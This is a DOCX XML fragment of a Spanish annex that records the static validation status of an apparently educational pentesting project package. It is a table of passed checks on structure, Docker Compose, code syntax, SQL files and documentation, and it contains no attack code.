    </w:p>
    <w:p w14:paraId="4173555E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="009EDB68" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Anexo D - Estado de validación del paquete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6953D99A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:b/>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Propósito. </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t xml:space="preserve">Registrar qué aspectos del paquete fueron verificados de manera estática y qué evidencias dinámicas deben obtenerse durante la ejecución local. </w:t>
      </w:r>
      <w:r w:rsidRPr="00742FE9">
        <w:rPr>
          <w:lang w:val="es-PE"/>
        </w:rPr>
        <w:t>Esta distinción evita afirmar pruebas que todavía no cuentan con capturas o salidas guardadas.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16"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w:rsidRPr="00742FE9" w14:paraId="53839030" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9216" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC"/>
          </w:tcPr>
          <w:p w14:paraId="50CFEB52" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Estado documentado: 65 comprobaciones estáticas aprobadas. La compilación, ejecución de contenedores, explotación controlada y obtención de evidencias deben real</w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:b/>
                <w:sz w:val="19"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>izarse en el equipo del estudiante antes de la entrega.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="793F74C0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Comprobaciones</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>estáticas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>realizadas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75"/>
        <w:gridCol w:w="3175"/>
        <w:gridCol w:w="3175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00217A21" w14:paraId="795241E6" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="126ED87F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="41744598" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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Verificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1F4E79"/>
          </w:tcPr>
          <w:p w14:paraId="249EC0AC" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383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217A21" w14:paraId="4A20C7A6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63B71654" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Estructura del proyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01E08570" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Carpetas backend, frontend, database, docker, docs, pentesting, scripts y evidencias presentes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D6BC2E7" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="172A1D08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669810D5" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Docker Compose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72CA99F0" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Archivo YAML válido; servicios </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>postgres</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>backend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>frontend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> definidos; puertos enlazados a 127.0.0.1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61806EDE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="71AD3BF6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45A88257" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Código Java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C9D138D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Archivos fuente revisados estructuralmente y sin llaves desbalanceadas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61040128" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="066CF683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1DE243CE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C4FFDFF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Los 13 </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">archivos JavaScript pasan validación sintáctica con </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>node</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> --</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>check</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="73CFD00A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="796D4BE3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1D39C234" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Scripts Bash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BDC0AB9" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Los scripts incluidos pasan </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>bash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> -n.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53944022" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="7815D91A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7105471C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="728602EB" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Referencias locales de HTML, CSS, JavaScript e imágenes sin faltantes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1A2AD40E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="3EB04C32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7936A73D" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Archivos XML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40BAC579" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">pom.xml y </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>placeholder.svg válidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5836859A" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="6F9106D8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0C67FF8C" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Base de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CC3481F" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>schema.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>data.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>init.sql</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y backup-v1.sql contienen estructura y datos reproducibles.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3AB291D2" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="31F7F08A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29C07957" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Documentación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57FBD599" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">README, guías, informe, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>checklist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">, scripts de </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> y colección </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Postman</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>incluidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="733E23FF" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00217A21" w14:paraId="6CB995B6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0FD39E33" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Limpieza del paquete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4468C99E" w14:textId="77777777" w:rsidR="00217A21" w:rsidRPr="00742FE9" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin target, JAR compilado, Maven </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t>Wrapper</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00742FE9">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:lang w:val="es-PE"/>
              </w:rPr>
              <w:t xml:space="preserve"> vacío ni archivos inesperadamente vacíos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3175" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E2F0D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="030B89FE" w14:textId="77777777" w:rsidR="00217A21" w:rsidRDefault="001E2383">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="006100"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Aprobado</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
